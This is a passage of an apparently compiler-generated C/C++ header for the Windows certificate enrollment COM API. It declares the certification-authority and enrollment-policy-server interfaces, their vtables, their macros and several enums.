    ( (This)->lpVtbl -> get_Property(This,property,pValue) ) 

#define IX509CertificateTemplateWritable_put_Property(This,property,value)	\
    ( (This)->lpVtbl -> put_Property(This,property,value) ) 

#define IX509CertificateTemplateWritable_get_Template(This,ppValue)	\
    ( (This)->lpVtbl -> get_Template(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateTemplateWritable_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0070 */
/* [local] */ 

typedef 
enum EnrollmentCAProperty
    {
        CAPropCommonName	= 1,
        CAPropDistinguishedName	= 2,
        CAPropSanitizedName	= 3,
        CAPropSanitizedShortName	= 4,
        CAPropDNSName	= 5,
        CAPropCertificateTypes	= 6,
        CAPropCertificate	= 7,
        CAPropDescription	= 8,
        CAPropWebServers	= 9,
        CAPropSiteName	= 10,
        CAPropSecurity	= 11,
        CAPropRenewalOnly	= 12
    } 	EnrollmentCAProperty;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0070_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0070_v0_0_s_ifspec;

#ifndef __ICertificationAuthority_INTERFACE_DEFINED__
#define __ICertificationAuthority_INTERFACE_DEFINED__

/* interface ICertificationAuthority */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertificationAuthority;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("835D1F61-1E95-4bc8-B4D3-976C42B968F7")
    ICertificationAuthority : public IDispatch
    {
    public:
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Property( 
            /* [in] */ enum EnrollmentCAProperty property,
            /* [retval][out] */ __RPC__out VARIANT *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertificationAuthorityVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertificationAuthority * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertificationAuthority * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertificationAuthority * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertificationAuthority * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertificationAuthority * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertificationAuthority * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertificationAuthority * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Property )( 
            __RPC__in ICertificationAuthority * This,
            /* [in] */ enum EnrollmentCAProperty property,
            /* [retval][out] */ __RPC__out VARIANT *pValue);
        
        END_INTERFACE
    } ICertificationAuthorityVtbl;

    interface ICertificationAuthority
    {
        CONST_VTBL struct ICertificationAuthorityVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertificationAuthority_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertificationAuthority_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertificationAuthority_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertificationAuthority_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertificationAuthority_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertificationAuthority_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertificationAuthority_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertificationAuthority_get_Property(This,property,pValue)	\
    ( (This)->lpVtbl -> get_Property(This,property,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertificationAuthority_INTERFACE_DEFINED__ */


#ifndef __ICertificationAuthorities_INTERFACE_DEFINED__
#define __ICertificationAuthorities_INTERFACE_DEFINED__

/* interface ICertificationAuthorities */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertificationAuthorities;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("13b79005-2181-11da-b2a4-000e7bbb2b09")
    ICertificationAuthorities : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICertificationAuthority **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ICertificationAuthority *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE ComputeSiteCosts( void) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ItemByName( 
            /* [in] */ __RPC__in BSTR strName,
            /* [retval][out] */ __RPC__deref_out_opt ICertificationAuthority **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertificationAuthoritiesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertificationAuthorities * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertificationAuthorities * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertificationAuthorities * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertificationAuthorities * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertificationAuthorities * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertificationAuthorities * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertificationAuthorities * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ICertificationAuthorities * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICertificationAuthority **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ICertificationAuthorities * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ICertificationAuthorities * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ICertificationAuthorities * This,
            /* [in] */ __RPC__in_opt ICertificationAuthority *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ICertificationAuthorities * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ICertificationAuthorities * This);
        
        HRESULT ( STDMETHODCALLTYPE *ComputeSiteCosts )( 
            __RPC__in ICertificationAuthorities * This);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByName )( 
            __RPC__in ICertificationAuthorities * This,
            /* [in] */ __RPC__in BSTR strName,
            /* [retval][out] */ __RPC__deref_out_opt ICertificationAuthority **ppValue);
        
        END_INTERFACE
    } ICertificationAuthoritiesVtbl;

    interface ICertificationAuthorities
    {
        CONST_VTBL struct ICertificationAuthoritiesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertificationAuthorities_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertificationAuthorities_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertificationAuthorities_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertificationAuthorities_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertificationAuthorities_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertificationAuthorities_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertificationAuthorities_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertificationAuthorities_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ICertificationAuthorities_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ICertificationAuthorities_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ICertificationAuthorities_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ICertificationAuthorities_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ICertificationAuthorities_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define ICertificationAuthorities_ComputeSiteCosts(This)	\
    ( (This)->lpVtbl -> ComputeSiteCosts(This) ) 

#define ICertificationAuthorities_get_ItemByName(This,strName,ppValue)	\
    ( (This)->lpVtbl -> get_ItemByName(This,strName,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertificationAuthorities_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0072 */
/* [local] */ 

typedef 
enum X509EnrollmentPolicyLoadOption
    {
        LoadOptionDefault	= 0,
        LoadOptionCacheOnly	= 1,
        LoadOptionReload	= 2,
        LoadOptionRegisterForADChanges	= 4
    } 	X509EnrollmentPolicyLoadOption;


enum EnrollmentPolicyFlags
    {
        DisableGroupPolicyList	= 0x2,
        DisableUserServerList	= 0x4
    } ;
typedef 
enum PolicyServerUrlPropertyID
    {
        PsPolicyID	= 0,
        PsFriendlyName	= 1
    } 	PolicyServerUrlPropertyID;

typedef 
enum X509EnrollmentPolicyExportFlags
    {
        ExportTemplates	= 0x1,
        ExportOIDs	= 0x2,
        ExportCAs	= 0x4
    } 	X509EnrollmentPolicyExportFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0072_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0072_v0_0_s_ifspec;

#ifndef __IX509EnrollmentPolicyServer_INTERFACE_DEFINED__
#define __IX509EnrollmentPolicyServer_INTERFACE_DEFINED__

/* interface IX509EnrollmentPolicyServer */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509EnrollmentPolicyServer;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("13b79026-2181-11da-b2a4-000e7bbb2b09")
    IX509EnrollmentPolicyServer : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in BSTR bstrPolicyServerUrl,
            /* [in] */ __RPC__in BSTR bstrPolicyServerId,
            /* [in] */ X509EnrollmentAuthFlags authFlags,
            /* [in] */ VARIANT_BOOL fIsUnTrusted,
            /* [in] */ X509CertificateEnrollmentContext context) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE LoadPolicy( 
            /* [in] */ X509EnrollmentPolicyLoadOption option) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetTemplates( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplates **pTemplates) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCAsForTemplate( 
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate,
            /* [retval][out] */ __RPC__deref_out_opt ICertificationAuthorities **ppCAs) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCAs( 
            /* [retval][out] */ __RPC__deref_out_opt ICertificationAuthorities **ppCAs) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Validate( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCustomOids( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppObjectIds) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetNextUpdateTime( 
            /* [retval][out] */ __RPC__out DATE *pDate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetLastUpdateTime( 
            /* [retval][out] */ __RPC__out DATE *pDate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetPolicyServerUrl( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetPolicyServerId( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetFriendlyName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetIsDefaultCEP( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetUseClientId( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetAllowUnTrustedCA( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCachePath( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCacheDir( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetAuthFlags( 
            /* [retval][out] */ __RPC__out X509EnrollmentAuthFlags *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE SetCredential( 
            /* [in] */ LONG hWndParent,
            /* [in] */ X509EnrollmentAuthFlags flag,
            /* [in] */ __RPC__in BSTR strCredential,
            /* [in] */ __RPC__in BSTR strPassword) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE QueryChanges( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeImport( 
            /* [in] */ VARIANT val) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Export( 
            /* [in] */ X509EnrollmentPolicyExportFlags exportFlags,
            /* [retval][out] */ __RPC__out VARIANT *pVal) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Cost( 
            /* [retval][out] */ __RPC__out DWORD *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Cost( 
            /* [in] */ DWORD value) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509EnrollmentPolicyServerVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509EnrollmentPolicyServer * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509EnrollmentPolicyServer * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509EnrollmentPolicyServer * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ __RPC__in BSTR bstrPolicyServerUrl,
            /* [in] */ __RPC__in BSTR bstrPolicyServerId,
            /* [in] */ X509EnrollmentAuthFlags authFlags,
            /* [in] */ VARIANT_BOOL fIsUnTrusted,
            /* [in] */ X509CertificateEnrollmentContext context);
        
        HRESULT ( STDMETHODCALLTYPE *LoadPolicy )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ X509EnrollmentPolicyLoadOption option);
        
        HRESULT ( STDMETHODCALLTYPE *GetTemplates )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplates **pTemplates);
        
        HRESULT ( STDMETHODCALLTYPE *GetCAsForTemplate )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate,
            /* [retval][out] */ __RPC__deref_out_opt ICertificationAuthorities **ppCAs);
        
        HRESULT ( STDMETHODCALLTYPE *GetCAs )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt ICertificationAuthorities **ppCAs);
        
        HRESULT ( STDMETHODCALLTYPE *Validate )( 
            __RPC__in IX509EnrollmentPolicyServer * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetCustomOids )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppObjectIds);
        
        HRESULT ( STDMETHODCALLTYPE *GetNextUpdateTime )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out DATE *pDate);
        
        HRESULT ( STDMETHODCALLTYPE *GetLastUpdateTime )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out DATE *pDate);
        
        HRESULT ( STDMETHODCALLTYPE *GetPolicyServerUrl )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetPolicyServerId )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetFriendlyName )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetIsDefaultCEP )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetUseClientId )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetAllowUnTrustedCA )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCachePath )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCacheDir )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetAuthFlags )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out X509EnrollmentAuthFlags *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *SetCredential )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ LONG hWndParent,
            /* [in] */ X509EnrollmentAuthFlags flag,
            /* [in] */ __RPC__in BSTR strCredential,
            /* [in] */ __RPC__in BSTR strPassword);
        
        HRESULT ( STDMETHODCALLTYPE *QueryChanges )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeImport )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ VARIANT val);
        
        HRESULT ( STDMETHODCALLTYPE *Export )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ X509EnrollmentPolicyExportFlags exportFlags,
            /* [retval][out] */ __RPC__out VARIANT *pVal);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Cost )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out DWORD *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Cost )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ DWORD value);
        
        END_INTERFACE
    } IX509EnrollmentPolicyServerVtbl;

    interface IX509EnrollmentPolicyServer
    {
        CONST_VTBL struct IX509EnrollmentPolicyServerVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509EnrollmentPolicyServer_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509EnrollmentPolicyServer_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509EnrollmentPolicyServer_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509EnrollmentPolicyServer_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509EnrollmentPolicyServer_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509EnrollmentPolicyServer_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509EnrollmentPolicyServer_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509EnrollmentPolicyServer_Initialize(This,bstrPolicyServerUrl,bstrPolicyServerId,authFlags,fIsUnTrusted,context)	\
    ( (This)->lpVtbl -> Initialize(This,bstrPolicyServerUrl,bstrPolicyServerId,authFlags,fIsUnTrusted,context) ) 

#define IX509EnrollmentPolicyServer_LoadPolicy(This,option)	\
    ( (This)->lpVtbl -> LoadPolicy(This,option) ) 

#define IX509EnrollmentPolicyServer_GetTemplates(This,pTemplates)	\
    ( (This)->lpVtbl -> GetTemplates(This,pTemplates) ) 

#define IX509EnrollmentPolicyServer_GetCAsForTemplate(This,pTemplate,ppCAs)	\
    ( (This)->lpVtbl -> GetCAsForTemplate(This,pTemplate,ppCAs) ) 

#define IX509EnrollmentPolicyServer_GetCAs(This,ppCAs)	\
    ( (This)->lpVtbl -> GetCAs(This,ppCAs) ) 

#define IX509EnrollmentPolicyServer_Validate(This)	\
    ( (This)->lpVtbl -> Validate(This) ) 

#define IX509EnrollmentPolicyServer_GetCustomOids(This,ppObjectIds)	\
    ( (This)->lpVtbl -> GetCustomOids(This,ppObjectIds) ) 

#define IX509EnrollmentPolicyServer_GetNextUpdateTime(This,pDate)	\
    ( (This)->lpVtbl -> GetNextUpdateTime(This,pDate) ) 

#define IX509EnrollmentPolicyServer_GetLastUpdateTime(This,pDate)	\
    ( (This)->lpVtbl -> GetLastUpdateTime(This,pDate) ) 

#define IX509EnrollmentPolicyServer_GetPolicyServerUrl(This,pValue)	\
    ( (This)->lpVtbl -> GetPolicyServerUrl(This,pValue) ) 

#define IX509EnrollmentPolicyServer_GetPolicyServerId(This,pValue)	\
    ( (This)->lpVtbl -> GetPolicyServerId(This,pValue) ) 

#define IX509EnrollmentPolicyServer_GetFriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> GetFriendlyName(This,pValue) ) 

#define IX509EnrollmentPolicyServer_GetIsDefaultCEP(This,pValue)	\
    ( (This)->lpVtbl -> GetIsDefaultCEP(This,pValue) ) 

#define IX509EnrollmentPolicyServer_GetUseClientId(This,pValue)	\
    ( (This)->lpVtbl -> GetUseClientId(This,pValue) ) 

#define IX509EnrollmentPolicyServer_GetAllowUnTrustedCA(This,pValue)	\
    ( (This)->lpVtbl -> GetAllowUnTrustedCA(This,pValue) ) 

#define IX509EnrollmentPolicyServer_GetCachePath(This,pValue)	\
    ( (This)->lpVtbl -> GetCachePath(This,pValue) ) 

#define IX509EnrollmentPolicyServer_GetCacheDir(This,pValue)	\
    ( (This)->lpVtbl -> GetCacheDir(This,pValue) ) 

#define IX509EnrollmentPolicyServer_GetAuthFlags(This,pValue)	\
    ( (This)->lpVtbl -> GetAuthFlags(This,pValue) ) 

#define IX509EnrollmentPolicyServer_SetCredential(This,hWndParent,flag,strCredential,strPassword)	\
    ( (This)->lpVtbl -> SetCredential(This,hWndParent,flag,strCredential,strPassword) ) 

#define IX509EnrollmentPolicyServer_QueryChanges(This,pValue)	\
    ( (This)->lpVtbl -> QueryChanges(This,pValue) ) 

#define IX509EnrollmentPolicyServer_InitializeImport(This,val)	\
